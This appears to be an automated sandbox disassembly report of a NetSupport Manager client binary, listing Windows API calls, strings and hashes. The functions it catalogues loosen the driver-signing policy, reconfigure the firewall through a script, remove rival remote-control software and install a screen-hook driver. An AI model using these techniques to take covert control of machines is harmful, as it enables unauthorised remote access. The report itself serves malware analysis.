                                                                                          • DeleteDC.GDI32(00000000), ref: 005C2511
                                                                                          • DeleteDC.GDI32(00000000), ref: 005C2514
                                                                                          • DeleteObject.GDI32(00000000), ref: 005C2520
                                                                                          • DeleteObject.GDI32(?), ref: 005C2526
                                                                                          Similarity
                                                                                          • API ID: Object$Color$DeleteSelect$Create$CompatibleText$Bitmap
                                                                                          • String ID:
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005962E0
                                                                                          • wsprintfW.USER32 ref: 005962F4
                                                                                          • wsprintfW.USER32 ref: 00596351
                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,80000002,?,00020019), ref: 005963D1
                                                                                          Similarity
                                                                                          • API ID: wsprintf$EnvironmentExpandStrings
                                                                                          • String ID: %sUseHKLM$%s\%s$ConfigList$General\ProductId$HKCU$HKLM$NSM$NSS$NetSupport School$NetSupport School Pro$Software\NetSupport Ltd$Software\Productive Computer Insight$\
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005BEA34
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 005BE941
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          Similarity
                                                                                          • API ID: wsprintf$CurrentDirectoryLocalTimewvsprintf
                                                                                          • String ID: %s\%s$Update [%s]%s=%s, format=%d$can't open client32.upd$client32.ini$client32.ini %s$client32.upd$client32u.ini$client32u.ini %s$doesn't exist$error %d opening %s - update failed$exists$update error$update error - wrong file format?$updating from client32.upd, cwd=%s
                                                                                          APIs
                                                                                          • OpenFileMappingW.KERNEL32(000F001F,00000000,00000000,:Y,?,?,00000000), ref: 005AC858
                                                                                          • GetLastError.KERNEL32 ref: 005AC86B
                                                                                          • GetLastError.KERNEL32(00000000), ref: 005AC86E
                                                                                          • wsprintfW.USER32 ref: 005AC884
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$FileMappingOpenwsprintf
                                                                                          • String ID: can't open filemap(%s), gle=%d (x%x)$cant map$openevent error$ver dead$ver unknown$zero pid$:Y
                                                                                          APIs
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005AF0CD
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005AF145
                                                                                          • GetTempFileNameW.KERNEL32(?,0061D714,00000000,?), ref: 005AF158
                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 005AF16E
                                                                                          • MoveFileExW.KERNEL32(?,?,00000005), ref: 005AF1A3
                                                                                          Strings
                                                                                          • gdihook5 (e2=%d), xrefs: 005AF430
                                                                                          • using .inf=%s, xrefs: 005AF060
                                                                                          • InstallGdihook5 ret %d, xrefs: 005AF496
                                                                                          • copy %s to %s ok, xrefs: 005AF186
                                                                                          • gdihook5.dll, xrefs: 005AF0B8
                                                                                          • gdihook5.inf, xrefs: 005AF052
                                                                                          • Try again after removing the 'Block Unsigned Driver Policy', xrefs: 005AF472
                                                                                          • Unloadable mirror detected - update on reboot, xrefs: 005AF12C
                                                                                          • mirror already installed, xrefs: 005AF105
                                                                                          • \gdihook5.dll, xrefs: 005AF0F1
                                                                                          • rename %s to %s on reboot ok, xrefs: 005AF1BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$DirectorySystem$CopyMoveNameTemp
                                                                                          • String ID: Try again after removing the 'Block Unsigned Driver Policy'$InstallGdihook5 ret %d$Unloadable mirror detected - update on reboot$\gdihook5.dll$copy %s to %s ok$gdihook5 (e2=%d)$gdihook5.dll$gdihook5.inf$mirror already installed$rename %s to %s on reboot ok$using .inf=%s
                                                                                          APIs
                                                                                            • Part of subcall function 005B6BB0: GetDC.USER32(00000000), ref: 005B6BB7
                                                                                            • Part of subcall function 005B60C0: GetObjectW.GDI32(?,00000018,?), ref: 005B60DE
                                                                                            • Part of subcall function 005B60C0: GetStockObject.GDI32(0000000F), ref: 005B60F2
                                                                                            • Part of subcall function 005B60C0: GetDC.USER32(00000000), ref: 005B6174
                                                                                            • Part of subcall function 005B60C0: SelectPalette.GDI32(00000000,?,00000000), ref: 005B6185
                                                                                            • Part of subcall function 005B60C0: RealizePalette.GDI32(00000000), ref: 005B618B
                                                                                            • Part of subcall function 005B60C0: GlobalAlloc.KERNEL32(00000042,?), ref: 005B61A6
                                                                                            • Part of subcall function 005B60C0: SelectPalette.GDI32(00000000,?,00000001), ref: 005B61BA
                                                                                            • Part of subcall function 005B60C0: RealizePalette.GDI32(00000000), ref: 005B61BD
                                                                                            • Part of subcall function 005B60C0: ReleaseDC.USER32(00000000,00000000), ref: 005B61C5
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 005B8CC7
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 005B8CF3
                                                                                          • GlobalLock.KERNEL32(?), ref: 005B8D0B
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 005B8D11
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 005B8EF0
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 005B8EF7
                                                                                          • GlobalUnlock.KERNEL32(?), ref: 005B8F05
                                                                                          • GlobalFree.KERNEL32(?), ref: 005B8F0C
                                                                                          • DeleteObject.GDI32(?), ref: 005B8F17
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 005B8F2E
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 005B8F37
                                                                                          • GlobalUnlock.KERNEL32(?), ref: 005B8F3D
                                                                                          • GlobalFree.KERNEL32(?), ref: 005B8F43
                                                                                          • DeleteObject.GDI32(00000000), ref: 005B8F63
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 005B8F7D
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 005B8F80
                                                                                          • GlobalUnlock.KERNEL32(?), ref: 005B8F8E
                                                                                          • GlobalFree.KERNEL32(?), ref: 005B8F91
                                                                                          • DeleteObject.GDI32(00000000), ref: 005B8F9C
                                                                                          Similarity
                                                                                          • API ID: Global$Object$FreeUnlock$Palette$Delete$LockRealizeSelect$AllocReleaseStock
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Deletewsprintf
                                                                                          • String ID: DisplayName$InstallUninstall$NSM$NetSupport Manager for Windows (32 bit) V14.10$Software\Microsoft\Windows\CurrentVersion\Uninstall\%s$UninstallString$winstall /U /P%s
                                                                                          APIs
                                                                                          • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 005CCE84
                                                                                          • CreateFontIndirectW.GDI32(?), ref: 005CCEA5
                                                                                          • GetDC.USER32(00000000), ref: 005CCF5A
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005CCF64
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 005CCF6E
                                                                                          • GetTextExtentPoint32W.GDI32(00000000,00621584,00000001,?), ref: 005CCF89
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005CCF97
                                                                                          • DeleteObject.GDI32(00000000), ref: 005CCF9E
                                                                                          • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 005CCFD0
                                                                                          • DeleteDC.GDI32(00000000), ref: 005CCFDC
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005CCFE5
                                                                                          • GetMenuInfo.USER32(?,?), ref: 005CD074
                                                                                          • SetMenuInfo.USER32(?,0000001C), ref: 005CD090
                                                                                          Similarity
                                                                                          • API ID: CreateInfoObject$DeleteMenuSelect$CompatibleExtentFontIndirectParametersPoint32ReleaseSectionSystemText
                                                                                          • String ID: ($IncreaseMenuItemHeight
                                                                                          APIs
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005AF0CD
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005AF145
                                                                                          • GetTempFileNameW.KERNEL32(?,0061D714,00000000,?), ref: 005AF158
                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 005AF16E
                                                                                          • MoveFileExW.KERNEL32(?,?,00000005), ref: 005AF1A3
                                                                                          • wsprintfW.USER32 ref: 005AF436
                                                                                          Strings
                                                                                          • gdihook5 (e2=%d), xrefs: 005AF430
                                                                                          • InstallGdihook5 ret %d, xrefs: 005AF496
                                                                                          • copy %s to %s ok, xrefs: 005AF186
                                                                                          • gdihook5.dll, xrefs: 005AF0B8
                                                                                          • Try again after removing the 'Block Unsigned Driver Policy', xrefs: 005AF472
                                                                                          • Unloadable mirror detected - update on reboot, xrefs: 005AF12C
                                                                                          • mirror already installed, xrefs: 005AF105
                                                                                          • \gdihook5.dll, xrefs: 005AF0F1
                                                                                          • rename %s to %s on reboot ok, xrefs: 005AF1BB
                                                                                          Similarity
                                                                                          • API ID: File$DirectorySystem$CopyMoveNameTempwsprintf
                                                                                          • String ID: Try again after removing the 'Block Unsigned Driver Policy'$InstallGdihook5 ret %d$Unloadable mirror detected - update on reboot$\gdihook5.dll$copy %s to %s ok$gdihook5 (e2=%d)$gdihook5.dll$mirror already installed$rename %s to %s on reboot ok
                                                                                          APIs
                                                                                          • GetDC.USER32(?), ref: 005CC2AD
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005CC2BF
                                                                                            • Part of subcall function 005C9840: LoadLibraryW.KERNEL32(gdi32.dll), ref: 005C9855
                                                                                            • Part of subcall function 005C9840: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 005C9867
                                                                                            • Part of subcall function 005C9840: FreeLibrary.KERNEL32(00000000), ref: 005C987E
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005CC2CF
                                                                                            • Part of subcall function 005C9710: GetVersionExW.KERNEL32(?), ref: 005C976E
                                                                                            • Part of subcall function 005C9710: LoadLibraryW.KERNEL32(kernel32.dll), ref: 005C9795
                                                                                            • Part of subcall function 005C9710: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 005C97A7
                                                                                            • Part of subcall function 005C9710: FreeLibrary.KERNEL32(00000000), ref: 005C97BF
                                                                                            • Part of subcall function 005C9710: GetSystemDefaultLangID.KERNEL32 ref: 005C97CA
                                                                                          • LoadBitmapW.USER32(00000000,?), ref: 005CC2F9
                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 005CC309
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005CC323
                                                                                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 005CC33B
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 005CC346
                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00CC0020), ref: 005CC384
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005CC395
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005CC39C
                                                                                          • DeleteDC.GDI32(00000000), ref: 005CC3A5
                                                                                          • DeleteDC.GDI32(00000000), ref: 005CC3A8
                                                                                          • ReleaseDC.USER32(?,?), ref: 005CC3B2
                                                                                          • DeleteObject.GDI32(00FF00FF), ref: 005CC3E4
                                                                                          • DeleteObject.GDI32(?), ref: 005CC3EA
                                                                                          Similarity
                                                                                          • API ID: Object$DeleteLibrarySelect$CompatibleCreateLoad$AddressBitmapFreeProc$DefaultLangReleaseSystemVersion
                                                                                          • String ID:
                                                                                          • API String ID: 3487081073-0
                                                                                          APIs
                                                                                          • wsprintfA.USER32 ref: 005A8267
                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 005A82E0
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005A8309
                                                                                          • Sleep.KERNEL32(000003E8), ref: 005A8314
                                                                                          • CloseHandle.KERNEL32(?), ref: 005A8329
                                                                                          Similarity
                                                                                          • API ID: CloseCreateHandleObjectProcessSingleSleepWaitwsprintf
                                                                                          • String ID: *** Use ICFConfig2 ***$CreateProcess() failed: $D$WScript.exe icfconfig.vbs %s "%s" "%s"$disable$enable$remove
                                                                                          • API String ID: 799559274-3812129836
                                                                                          APIs
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • LoadLibraryW.KERNEL32(newdev.dll), ref: 005AE3EA
                                                                                          • GetProcAddress.KERNEL32(00000000,UpdateDriverForPlugAndPlayDevicesW), ref: 005AE403
                                                                                          • CreateThread.KERNEL32(00000000,00000000,005AE360,00000000,00000000,?), ref: 005AE426
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005AE431
                                                                                          Strings
                                                                                          • UpdateGdihook5, xrefs: 005AE3D6
                                                                                          • UpdateDriverForPlugAndPlayDevices returned error %d, xrefs: 005AE477
                                                                                          • UpdateDriverForPlugAndPlayDevicesW, xrefs: 005AE3FD
                                                                                          • newdev.dll, xrefs: 005AE3E5
                                                                                          • UpdateGdihook5 end, xrefs: 005AE498
                                                                                          • Returned from UpdateDriverForPlugAndPlayDevices, xrefs: 005AE484
                                                                                          • About to call UpdateDriverForPlugAndPlayDevices, xrefs: 005AE447
                                                                                          Similarity
                                                                                          • API ID: Librarywsprintf$AddressCreateFreeLoadLocalProcThreadTimewvsprintf
                                                                                          • String ID: About to call UpdateDriverForPlugAndPlayDevices$Returned from UpdateDriverForPlugAndPlayDevices$UpdateDriverForPlugAndPlayDevices returned error %d$UpdateDriverForPlugAndPlayDevicesW$UpdateGdihook5$UpdateGdihook5 end$newdev.dll
                                                                                          • API String ID: 1673483672-437864977
                                                                                          APIs
                                                                                          • FindWindowW.USER32(NSMMain,00000000), ref: 005D428F
                                                                                          • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 005D42AB
                                                                                          • IsWindow.USER32(00000000), ref: 005D42B2
                                                                                          • Sleep.KERNEL32(00000064), ref: 005D42BA
                                                                                          • IsWindow.USER32(00000000), ref: 005D42BD
                                                                                          • FindWindowW.USER32(NSMMain,00000000), ref: 005D42CA
                                                                                          • FindWindowW.USER32(CICWClass,00000000), ref: 005D42F3
                                                                                          • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 005D4300
                                                                                          • FindWindowW.USER32(NSMWControl32,00000000), ref: 005D430D
                                                                                          • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 005D431C
                                                                                          Similarity
                                                                                          • API ID: Window$Find$MessagePost$Sleep
                                                                                          • String ID: CICWClass$NSMMain$NSMWClass$NSMWControl32
                                                                                          • API String ID: 376684987-1708001160
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005C024B
                                                                                            • Part of subcall function 005B4990: RegOpenKeyExW.ADVAPI32(?,80000002,00000000,00596384,?,00000000,752F55F0,00000010,?,00596384,80000002,?,00020019), ref: 005B49AC
                                                                                            • Part of subcall function 005B44E0: RegEnumKeyExW.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 005B452B
                                                                                          Similarity
                                                                                          • API ID: EnumOpenwsprintf
                                                                                          • String ID: %s\%s$ConfigList$Files\AppData$Files\CommonAppData$Files\LocalAppData$Files\Shared$General\ProductId$IsA()$Set HKLM\...%s\Files\Shared=1$Software\Productive Computer Insight$chg HKLM %s to %s from %s$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                          • API String ID: 934838074-710025092
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005D8832
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,0002001F,?), ref: 005D88C9
                                                                                            • Part of subcall function 005DF5E0: LoadStringW.USER32(00590000,000003F9,?,00000100), ref: 005DF60A
                                                                                            • Part of subcall function 005DF5E0: wvsprintfW.USER32(?,?,00000000), ref: 005DF622
                                                                                          Similarity
                                                                                          • API ID: LoadOpenStringwsprintfwvsprintf
                                                                                          • String ID: /S$"%s%s" /* %s%s$%s=%s, e=%d$C:\Windows\Installer\$ImagePath$IsA()$SYSTEM\CurrentControlSet\Services\%s$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                          • API String ID: 2115948977-3284006978
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,HARDWARE\DeviceMap\Video,00000000,00020019,?), ref: 005D28C0
                                                                                          • RegQueryValueExW.ADVAPI32(?,\Device\Video0,00000000,?,?,?), ref: 005D28FB
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005D2912
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,?,?), ref: 005D2A0A
                                                                                          • RegQueryValueExW.ADVAPI32(?,InstalledDisplayDrivers,?,?,?,00000200), ref: 005D2A4E
                                                                                          • RegSetValueExW.ADVAPI32(?,InstalledDisplayDrivers,00000000,00000007,?,?), ref: 005D2A68
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005D2A96
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005D2AE9
                                                                                          Similarity
                                                                                          • API ID: CloseValue$OpenQuery
                                                                                          • String ID: HARDWARE\DeviceMap\Video$InstalledDisplayDrivers$\ControlSet$\Device\Video0$gfff
                                                                                          • API String ID: 3962714758-2659084398
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Driver Signing,00000000,000F003F,?), ref: 005AEB4F
                                                                                          • RegQueryValueExW.ADVAPI32(?,Policy,00000000,?,?,?), ref: 005AEB77
                                                                                          • RegSetValueExW.ADVAPI32(00000000,Policy,00000000,00000004,?,00000004,?,Policy,00000000,?,?,?), ref: 005AEBA4
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Driver Signing,00000000,000F003F,?), ref: 005AEBE1
                                                                                          • RegQueryValueExW.ADVAPI32(?,Policy,00000000,?,?,?), ref: 005AEC0D
                                                                                          • RegSetValueExW.ADVAPI32(00000000,Policy,00000000,00000003,?), ref: 005AEC3C
                                                                                          • Sleep.KERNEL32(000003E8), ref: 005AEC76
                                                                                          Similarity
                                                                                          • API ID: Value$OpenQuery$Sleep
                                                                                          • String ID: Policy$Software\Microsoft\Driver Signing$cupol %d$cupol err, e=%d$lmpol %d$lmpol err, e=%d
                                                                                          • API String ID: 3131223082-2395713291
                                                                                          • Opcode ID: 29a7582d3a0e455329bbdf35a4982a05a6f9d542fac2a12333212ea971860c53
                                                                                          • Instruction ID: cf9f30510ce50c6cd2ecc50ca5956c3338785c2983623817eb30cd5d891cc8a3
                                                                                          • Opcode Fuzzy Hash: 29a7582d3a0e455329bbdf35a4982a05a6f9d542fac2a12333212ea971860c53
                                                                                          • Instruction Fuzzy Hash: FE414EB1640305BFEB308F50CC86FEA7BA9FB5AB15F144519F60696180D3B0AA44CB72
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32 ref: 0059ADB9
                                                                                            • Part of subcall function 00599BE0: wvsprintfW.USER32(?,?,?), ref: 00599C0B
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: ErrorLastwvsprintf
                                                                                          • String ID: DeviceID %d=%s$HDAUDIO\$OK.$PCI\$SetupDiCallClassInstaller failed, e=x%x$SetupDiCallClassInstaller...$SetupDiEnumDeviceInfo failed, e=x%x$SetupDiGetClassDevs failed, e=x%x$SetupDiSetClassInstallParams failed, e=x%x$USB\
                                                                                          • API String ID: 2157943386-3105874866
                                                                                          • Opcode ID: 71086a022b65c836fcc23b0405c189b68192573b242d31a181fead34121c4867
                                                                                          • Instruction ID: 838e19a84a2426f98a002780d9c4bea8a9315da74e0b74dd80a2a162613d9c72
                                                                                          • Opcode Fuzzy Hash: 71086a022b65c836fcc23b0405c189b68192573b242d31a181fead34121c4867
                                                                                          • Instruction Fuzzy Hash: DA6161B5905219AEEF10AB60DC89FFA7B7DFF44700F044199B60992191DBB49E84CFB2
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$Library$Free$Load
                                                                                          • String ID: setupapi.dll
                                                                                          • API String ID: 1672654688-3506073724
                                                                                          • Opcode ID: 009a6454449da9b67770ad3734851596c0695e13cbacd14fc81686beaeaaedcb
                                                                                          • Instruction ID: 473794815b9245e7cf8b681a66bf0c65c371d893dd4738f564abb0d15e43c2d6
                                                                                          • Opcode Fuzzy Hash: 009a6454449da9b67770ad3734851596c0695e13cbacd14fc81686beaeaaedcb
                                                                                          • Instruction Fuzzy Hash: E8A10A70A002199FDB24DF69CD98FAEB7B9FF88700F14459AE509E7250D7709E808FA1
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: EnumValue
                                                                                          • String ID: "$%s doesnt exist$%s exists$%s=%s, err=%d$Del %s, err=%d$Found %s$\%s
                                                                                          • API String ID: 2814608202-2885399614
                                                                                          • Opcode ID: a09310e5c5964e62b4818d7852a94c8d00bd5a6e454aa4e0499141b79b9bcb7c
                                                                                          • Instruction ID: bb1ab667ea6000a7bb3da6ccfe3ea891ccd110aa4bcb9cf9d44b346666ae4730
                                                                                          • Opcode Fuzzy Hash: a09310e5c5964e62b4818d7852a94c8d00bd5a6e454aa4e0499141b79b9bcb7c
                                                                                          • Instruction Fuzzy Hash: 7081817690012A9BDF34DB58CC85AEEB7B9FF84300F4485D6F50A97251EF709A488FA1
                                                                                          APIs
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 005DAF0A
                                                                                          • RegQueryValueExW.ADVAPI32(?,UninstallString,00000000,?,?,?), ref: 005DAF5D
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005DAF68
                                                                                          • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 005DB07D
                                                                                            • Part of subcall function 005DF5E0: LoadStringW.USER32(00590000,000003F9,?,00000100), ref: 005DF60A
                                                                                            • Part of subcall function 005DF5E0: wvsprintfW.USER32(?,?,00000000), ref: 005DF622
                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005DAFE2
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005DB01C
                                                                                          • CloseHandle.KERNEL32(?), ref: 005DB02F
                                                                                          • CloseHandle.KERNEL32(?), ref: 005DB038
                                                                                          • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 005DB04D
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Close$HandleOpenwsprintfwvsprintf$CreateDeleteLoadLocalObjectProcessQuerySingleStringTimeValueWait
                                                                                          • String ID: D$NukeRival : %s$UninstallString
                                                                                          • API String ID: 1387685028-3656226284
                                                                                          • Opcode ID: 0822ee4429495a14ce9e159395c8c6c94becfc249c9b23dbb6a124031e14d36b
                                                                                          • Instruction ID: e1080906f628d89542d1faec10e28d74e5cd8d70adb1f90899a2d21e2ed0bc99
                                                                                          • Opcode Fuzzy Hash: 0822ee4429495a14ce9e159395c8c6c94becfc249c9b23dbb6a124031e14d36b
                                                                                          • Instruction Fuzzy Hash: 0D41B775A00119ABEB34DB68DC4DFEA77B9FB48300F04429BF51D97291DA709E40CBA1
                                                                                          APIs
                                                                                          • GetStockObject.GDI32(0000000D), ref: 005CC104
                                                                                          • GetObjectW.GDI32(00000000,0000005C,?), ref: 005CC116
                                                                                          • CreateFontIndirectW.GDI32(?), ref: 005CC208
                                                                                          • GetStockObject.GDI32(0000000D), ref: 005CC23C
                                                                                          • CreateFontIndirectW.GDI32(?), ref: 005CC254
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Object$CreateFontIndirectStock
                                                                                          • String ID: ..\CTL32\util.cpp$IsA()$MS Shell Dlg$Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h$hFont$hSubstitutedFont
                                                                                          • API String ID: 3061784605-2717502809
                                                                                          • Opcode ID: 61fce3a5f646c6d58eabf4fa65ca578a6e1b9f4f1851751ddd62a6e943c33d58
                                                                                          • Instruction ID: 49ac3302c32a55c09327fc08ac525fa6de049e506797710033bcdf59396babdc
                                                                                          • Opcode Fuzzy Hash: 61fce3a5f646c6d58eabf4fa65ca578a6e1b9f4f1851751ddd62a6e943c33d58
                                                                                          • Instruction Fuzzy Hash: 8A519E749007099FDB20DBE4DC6AFAE7FB5FB59700F544119F815AB282E7705904CBA0
                                                                                          APIs
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 005C4550
                                                                                          • GetDC.USER32(00000000), ref: 005C4579
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005C4588
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005C458D
                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 005C45A5
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 005C45B0
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005C45BE
                                                                                          • StretchBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 005C460C
                                                                                          • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 005C4624
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005C462F
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005C463A
                                                                                          • DeleteDC.GDI32(00000000), ref: 005C4647
                                                                                          • DeleteDC.GDI32(00000000), ref: 005C464A
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005C464F
                                                                                          Similarity
                                                                                          • API ID: Object$Select$CompatibleCreate$Delete$BitmapReleaseStretch
                                                                                          • String ID:
                                                                                          • API String ID: 3950507155-0
                                                                                          • Opcode ID: 02f29ce8f559b390a0325722f44cfa014ae40d9a38474154a251861d0155d354
                                                                                          • Instruction ID: 1660f7f1a5abcc8fdb4e06ae52c223041992132a7290c992d3ddbb2dd69fd33a
                                                                                          • Opcode Fuzzy Hash: 02f29ce8f559b390a0325722f44cfa014ae40d9a38474154a251861d0155d354
                                                                                          • Instruction Fuzzy Hash: B541E5B1A00209BFEB14DFA4DC99FEF7BB9EB49711F188119F905A3290D670AD408B75
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32 ref: 005CA4AD
                                                                                          • wsprintfW.USER32 ref: 005CA4CF
                                                                                          • OutputDebugStringW.KERNEL32(?), ref: 005CA4DF
                                                                                            • Part of subcall function 005C55B0: GetTickCount.KERNEL32 ref: 005C5618
                                                                                          • GetModuleHandleW.KERNEL32(NSMTRACE.DLL), ref: 005CA4F7
                                                                                          • GetProcAddress.KERNEL32(00000000,NSMTraceFlush), ref: 005CA507
                                                                                          • OutputDebugStringW.KERNEL32(?), ref: 005CA54B
                                                                                          • GetVersion.KERNEL32 ref: 005CA556
                                                                                          • SetLastError.KERNEL32(?), ref: 005CA57D
                                                                                          • GetKeyState.USER32(00000011), ref: 005CA598
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: DebugErrorLastOutputString$AddressCountHandleModuleProcStateTickVersionwsprintf
                                                                                          • String ID: Exception caught at %x. Trying minidump.$NSMTRACE.DLL$NSMTraceFlush
                                                                                          • API String ID: 521685582-1300527790
                                                                                          • Opcode ID: 5da17e5ab0970593e54ab0230582fb3612d07cf73d4412ae68162ee2a1194bee
                                                                                          • Instruction ID: 03905d96814dedfbc64d502f5f6bcbd0d2640e2653d79d49b4fe506637d784ed
                                                                                          • Opcode Fuzzy Hash: 5da17e5ab0970593e54ab0230582fb3612d07cf73d4412ae68162ee2a1194bee
                                                                                          • Instruction Fuzzy Hash: B631E4B1900208AFDB14EBA0DC9DFDA7B79BB44704F04C1AAF519D3192EA709A40CFA1
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 005B6698
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005B66AD
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005B66B6
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005B66C0
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 005B66D5
                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 005B670E
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 005B6719
